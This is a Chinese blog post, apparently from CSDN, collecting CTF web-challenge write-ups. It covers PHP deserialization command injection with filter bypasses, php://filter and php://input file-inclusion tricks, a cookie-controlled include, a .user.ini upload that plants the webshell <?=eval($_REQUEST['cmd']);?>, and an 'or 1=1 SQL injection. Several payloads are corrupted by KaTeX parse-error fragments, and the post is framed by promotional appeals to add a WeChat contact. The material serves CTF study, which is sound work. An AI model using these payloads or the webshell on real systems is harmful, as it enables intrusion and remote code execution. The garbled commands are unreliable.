CTF题目合集_网络安全ctf大赛题库，网络安全最牛教材

最新推荐文章于 2024-05-07 10:23:13 发布

2301_81327376

最新推荐文章于 2024-05-07 10:23:13 发布

阅读量912

点赞数 28

分类专栏： 2024年程序员学习文章标签： web安全网络安全

本文链接：https://blog.csdn.net/2301_81327376/article/details/137853859

版权

2024年程序员学习专栏收录该内容

248 篇文章 0 订阅

订阅专栏

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

$t hi s - > a r g s [$ k] = $t hi s - > w a f ($ v);
}

反序列化之后就会调用wakeup这个函数：这个函数的内容是对参数的内容进行了循环遍历执行WAF函数的内容

function waf($str){
if (!preg_match_all(“/(||&|;| |/|cat|flag|tac|php|ls)/”, $str, $pat_array)) {
return $str;
} else {
echo “don’t hack”;
}

这个WAF函数是执行了过滤的操作对参数的内容进行的过滤过滤了如下这些内容

在WAF这段PHP脚本结束后就会执行destruct这个函数这个函数进行了判断如果$this->method 包含了ping这个方法就使用这个函数 call_user_func_array
call_user_func_array 这个函数的作用：call_user_func_array() 函数的作用是以回调函数的方式调用一个函数，并将一个数组作为参数传递给该函数。

在给定的代码中，call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method（也就是调用ping函数的方法也就是destruct下面那个ping函数），并将 $this->args 数组作为参数传递给该方法。

这种用法通常用于动态地调用对象的方法，并根据需要传递不同的参数。通过将方法和参数封装到一个数组中，可以实现更灵活的调用方式。例如，可以在运行时决定要调用哪个方法，以及传递什么样的参数。

所以可以看出来这个$this->method调用的是ping这个方法 args就是所要传的参数所以从这里就可以看出来ctf需要传两个内容一个是ping 另一个就是ping的内容了
所以下面那个ping函数的内容那个$ip就是参数的内容所以现在就需要构造这个参数的内容
所以现在就需要构造payload 构造payload时候需要一个new ease的函数
new ease 是创建 ease 类的一个对象实例。它使用 new 关键字来实例化一个对象，将 ease 类实例化为一个对象，使得该对象可以调用类中定义的方法和属性
开始构造payload 首先需要ls一下看看有没有flag的文件由于 ls被过滤了可以但那时\没有被过滤所以我们可以使用l\s来绕过因为在linux中是可以这样拼接命令的 l\仍会继续你继续输入s后会执行ls的命令

<?php
highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

$payload = new ease ('ping',array('l\s'));
echo base64_encode(serialize($payload));

39 40 行就是写的payload newease函数调用了ping这个类的方法后面跟的数组array就是那个$ip的内容然后这个内容就会调用exec这个命令中去执行返回result 然后源代码中也会输出这个result的内容
其次需要用burp来抓包注意一开始抓包是get的请求我们需要改成post 方法如下：
然后发送到repeater的模块
注意post请求发参数的形式就是这样的并且在render模块进行查看
ls 后可以发现有flag的文件（也可能是目录）接下来我们需要查看这个文件（目录）的内容来获得flag 我们需要继续修改payload的内容 $KaTeX parse error: Undefined control sequence: \s at position 36: …'ping',array('l\̲s̲$ {IFS}fl\ag_1s_here’));
找到文件后我们需要查看这个文件的内容
但是现在需要查看这个文件的内容就需要more + 这个目录 + \ + 这个文件的名字
但是这里不能直接用\ 我们需要用8进制编码来输出这个\ ：\57
应该如何输出这个东西呢：在linux环境下 $(p r in t f$ {IFS}“\57”) 这样就会输出 \ 注意括号必须加上
payload 为 more $KaTeX parse error: Undefined control sequence: \ag at position 8: {IFS}fl\̲a̲g̲\_1s\_here$ (printf${IFS}“\57”)fl\ag_831b69012c67b35f.p\hp
获得flag

2.file_include题目

<?php highlight\_file(\_\_FILE\_\_); include("./check.php"); if(isset($\_GET['filename'])){ $filename = $\_GET['filename']; include($filename); } ?>

首先get方式传一个filename的参数
然后包含他
这里的思路：通过php的伪协议（php:filter//）来获取flag（猜测存放flag的文件是flag.php）
# 明文读取

?filename=php://filter/resource=flag.php

发现并没有回显，猜测可能是页面源码里面有

发现并没有可能是被注释掉了

# 编码读取

?filename=php://filter/read=convert.base64-encode/resource=flag.php

尝试用base64过滤器的方法并没有得到flag但是可以了解flag确实是在flag.php中
接下来尝试其他的过滤器的方法
convert.base64

convert.base64-encode和 convert.base64-decode使用这两个过滤器等同于分别用base64_encode()和base64_decode()函数处理所有的流数据。convert.base64-encode支持以一个关联数组给出的参数。如果给出了line-length，base64 输出将被用line-length个字符为长度而截成块。如果给出了line-break-chars，每块将被用给出的字符隔开。这些参数的效果和用base64_encode()再加上 chunk_split()相同。

convert.quoted

convert.quoted-printable-encode和convert.quoted-printable-decode使用此过滤器的decode版本等同于用 quoted_printable_decode()函数处理所有的流数据。没有和convert.quoted-printable-encode相对应的函数。convert.quoted-printable-encode支持以一个关联数组给出的参数。除了支持和convert.base64-encode一样的附加参数外，convert.quoted-printable-encode还支持布尔参数binary和 force-encode-first。convert.base64-decode只支持line-break-chars参数作为从编码载荷中剥离的类型提示。

convert.iconv.*

这个过滤器需要php支持 iconv ，而iconv是默认编译的。使用convert.iconv.*过滤器等同于用iconv()函数处理所有的流数据。

尝试使用convert.iconv.这个过滤器试试

利用方式如下：convert.iconv.utf8.utf8 必须后面跟两种字符编码的方式但是如果一个一个试有点麻烦用BP来多次进行尝试攻击

?filename=php://filter/convert.iconv.utf8.utf8/resource=flag.php
接下来在response上找有正常编码的flag即可
flag为 cyberpeace{ec5a54fdd71ae884958c476bd0493f6e}

3.php代码审计


<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;

$a = $_GET['a'];
$b = $_GET['b'];

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
$key1 = 1;
}else{
die("Emmm...再想想");
}
}else{
die("Emmm...");
}

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
$d = array_search("DGGJ", $c["n"]);
$d === false?die("no..."):NULL;
foreach($c["n"] as $key=>$val){
$val==="DGGJ"?die("no......"):NULL;
}
$key2 = 1;
}else{
die("no hack");
}
}else{
die("no");
}

if($key1 && $key2){
include "Hgfks.php";
echo "You're right"."\n";
echo $flag;
}

?>

Emmm...

分析代码：
$a = $_GET[‘a’];
$b = $_GET[‘b’];

以get方式传ab两个参数

if(isset( $KaTeX parse error: Expected 'EOF', got '&' at position 4: a) &̲& intval($ a) > 6000000 && strlen($a) <= 3)
如果传了a得值并且a经过intval转化后的整数得值要>6000000 并且a得长度小于等于3，但是这里就会有一个矛盾得点又得大于6000000又得长度小于3
我们可以用1e9来上传 1e9也就是 10的9次方这样就可以满足原题的条件
if(isset( $KaTeX parse error: Expected 'EOF', got '&' at position 4: b) &̲& '8b184b' === \dots$ b),-6,6))
如果传了一个b的值并且还得满足后面的条件
我们需要算出来这个b的值用代码算即可
代码如下

<?php
$b = 0;
while(True)
{
    if('8b184b' === substr(md5($b),-6,6))
    {
        echo $b;
        break;
    }
    $b++;
}

$c=(array)json\_decode(@$ _GET[‘c’]);
解释这个代码：

@$_GET[‘c’]：这段代码首先尝试从GET请求中获取名为"c"的参数的值。
json_decode()：然后使用json_decode()函数将获取到的JSON字符串解码为PHP对象。
(array)：最后，使用类型转换操作符(array)将解码后的PHP对象转换为数组。

举个例子，如果你通过URL发送了如下GET请求：

Copy Codehttp://example.com/script.php?c={"name":"John","age":30}

那么上面的PHP代码将把URL中的"c"参数值解析为JSON对象，并转换为PHP数组，类似于下面的结果：

Copy Code$c = array(
    "name" => "John",
    "age" => 30
);

if(is_array( $KaTeX parse error: Expected 'EOF', got '&' at position 4: c) &̲& !is\_numeric(…$ c[“m”]) && $c[“m”] > 2022)
如果c是数组并且 !is_numeric(@ $c["m"]) ：使用is\_numeric函数检查数组$ c中名为m的元素的值是否为数字 $c[“m”] > 2022 ：并且这个m元素的值需要大于2022
这里就又矛盾了如果既要求m元素的值不是数字还需要大于 2022 这里php有一个语言特性 2023m>2022 在进行比较时 php会取一个比较数中前面的数字来进行与后面的数字的比较
if(is_array(@ $KaTeX parse error: Expected 'EOF', got '&' at position 9: c["n"]) &̲& count($ c[“n”]) == 2 && is_array($c[“n”][0])){
$d = array_search(“DGGJ”, $c[“n”]);
$d === f a l se ? d i e (" n o ...") : N ULL; f ore a c h ($ c[“n”] as $k ey =>$ val){
$val===“DGGJ”?die(“no…”):NULL;
如果c中名为n元素的值是数组并且这个数组中有两个元素并且第1个元素的值也是数组
注意这个arraysearch是个弱类型的比较是== 而不是 === 也就是说遍历c中n元素的值如果找到值==DGGJ 就继续下面的那个循环如果找不到就返回FALSE 也就直接终止程序了
接下来进入下面那个循环时又遍历c中n元素的值找DGGJ如果找到就终止程序
这个时候就又有矛盾了又需要值得等于DGGJ 又不能让她出现
这个时候就需要array_search 这个弱类型的比较了
因为他是== 而不是=== 这个时候如果“cgy”==0 这个等式是成立的
所以就可以这么进行绕过
所以最后的abc的参数为
?a=1e9&b=53724&c={“m”:“2023x”,“n”:[[],0]}
获得；flag

4.fileclude（仍是文件包含伪协议绕过）

 WRONG WAY!
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
$file1 = $_GET["file1"];
$file2 = $_GET["file2"];
if(!empty($file1) && !empty($file2))
{
if(file_get_contents($file2) === "hello ctf")
{
include($file1);
}
}
else
die("NONONO");
}

分析代码：

首先，它检查是否有名为"file1"和"file2"的GET参数传入。
然后，将这两个参数的值分别赋给变量file1和file1和file2。
接着，它检查file1和file1和file2是否都不为空。
如果满足上述条件，并且file2的内容等于"hello ctf"，那么它会包含file2的内容等于"helloctf**"，那么它会包含file1指定的文件。**
否则，会输出"NONONO"并终止程序。

现在需要上传file1与file2的值但是还必须将file2的值为hello ctf
仍在考php的伪协议
对于这个===hello ctf
需要用
对于file1则是??filename=php://filter/read=convert.base64-encode/resource=flag.php这段伪协议
又因为使用input这个命令执行的伪协议只能读取post中的data部分需要抓包才能将data的内容改为hello ctf
最后的url为
?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input
必须要在左边写hello ctf 才能使input函数读入这段字符串
因为是用base64编码的所以需要解码一下
flag为cyberpeace{4ac5762a8c1149754fecc0727f8245f4}

5.fileinclude

考点：考了cookie的利用以及文件包含php伪协议的利用

打开后发现页面没有源码什么的
用F12查看页面源代码试试
源码如下

<?php
if( !ini_get('display_errors') ) {
  ini_set('display_errors', 'On');
  }
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{
	@setcookie("language","english");
	@include("english.php");
}
else
{
	@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>

查看源码后发现里面include有可控的变量 cookie 中的language
所以用BP抓包修改cookie中language的值并用php伪协议来获取flag.php
发现并没有cookie的值所以需要我们自己写
注意这个cookie的赋值必须在connection下面并且这里将english赋给language后原来的报错没有了
证明填的位置正确了
所以只需要resource后面写flag即可因为源码中拼接了.php
最后解码一下即可
cyberpeace{b6408b005f630c84392534b561a3b11e} 得到flag

6.easyupload

考点：考文件上传漏洞

先上传.user.ini(必须是.user.ini文件不能少点要不然后面蚁剑连接不成功)文件使其包含一个图片然后再上传一个图片，最后用蚁剑来连接

GIF89a                  
auto_prepend_file=a.jpg

题头GIF89a是为了防止后端检测这个文件的开头是不是JPG或者其他图片格式可以绕过后端的检测
上传这个文件时用bp上传改一些内容也是防止后端检测
然后再上传一个jpg文件里面有一句话木马

GIF89a
<?=eval($_REQUEST['cmd']);?>

然后将格式改为jpg的格式继续再bp repeater模块中检测
这里发现仍然上传不上去
可能是检测了内容把php删掉改成=试试
上传成功
上传成功后，现在需要找到路径才能填蚁剑的那个地址
这个就是其地址
用蚁剑连接

7.inget&robots

由此可见是考SQL注入的

用万能钥匙来获得flag即可
?id=1’or 1=1 --+ 有时候需要双引号有时候单引号有时候不需要引号即可获得flag

这道题考robots协议
robots是搜索引擎爬虫协议，也就是你网站和爬虫的协议。

**简单的理解：**robots是告诉搜索引擎，你可以爬取收录我的什么页面，你不可以爬取和收录我的那些页面。robots很好的控制网站那些页面可以被爬取，那些页面不可以被爬取。

主流的搜索引擎都会遵守robots协议**。并且robots协议是爬虫爬取网站第一个需要爬取的文件。爬虫爬取robots文件后，会读取上面的协议，并准守协议爬取网站，收录网站。**

robots文件是一个纯文本文件，也就是常见的.txt文件。在这个文件中网站管理者可以声明该网站中不想被robots访问的部分，或者指定搜索引擎只收录指定的内容。因此，robots的优化会直接影响到搜索引擎对网站的收录情况。

可以发现这里有flag的文件所以我们直接在当前目录访问即可

8. get_post&disabled_button&cookie

用BP抓包上传post方式b的值

遇到页面没有什么可利用的消息可以按F12来获取信息
把disable删掉即可
然后按下按钮

考察cookie的相关信息
按F12
发现有cookie.php
然后访问cookie.php
然后让我们看http response

9. 备份文件&ics-06

猜测是目录扫描，从而找到flag的文件
扫描后发现这里是空的点开后有一个文件自动下载

打开后发现只有这个页面可以打开
猜测是SQL注入于是用SQLmap检测有没有sql注入的点
发现并没有
猜测id=1 这个整数1存在暴力破解
成功找到

10. PHP2

考点：URL解码：%+assic 16进制

页面上问的是：你能认证这个网站么
先F12查看有没有可利用的消息
发现并没有什么可利用的
尝试访问一下indedx.php
这道题考的是文件的后缀 phps：文件的源代码
例如 index.phps 查看的就是index.php的源代码
试着提交的id=admin （注意是在index.php上而不是index.phps上）
发现是not allowed 但是源代码中id后经过了url解码使得解码后的id 与admin相等
于是用url编码admin 但是 admin经过url编码后还是admin 没有变化
url解码是 %+ascii16进制（注意这里百分号也得是ascii表的16进制形式）
所以这里将a改为 %2561 25为%的ascii16进制 61为小写字母a的ascii16进制

11.robots

看了题目后猜测是robots协议
然后继续查看flag的文件即可

12. unserialize3&view_source

核心思想：不让wakeup这个函数执行只有反序列化异常的情况下（也就是属性值个数大于属性个数的时候即异常）

有一个PHP的类：xctf

有一个flag的对象

wakeup的方法如果触发了这个方法就离开了也就得不到flag的值

?code：将类以参数的形式传给xctf

目标：1.反序列化xctf

步骤：1.先序列化flag对象的值

学习路线：

这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。不过，要想从脚本小子变成黑客大神，这个方向越往后，需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容：
在这里插入图片描述

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

sdnimg.cn/img_convert/555e22a2d6cc81ba52f9573f65fab753.png)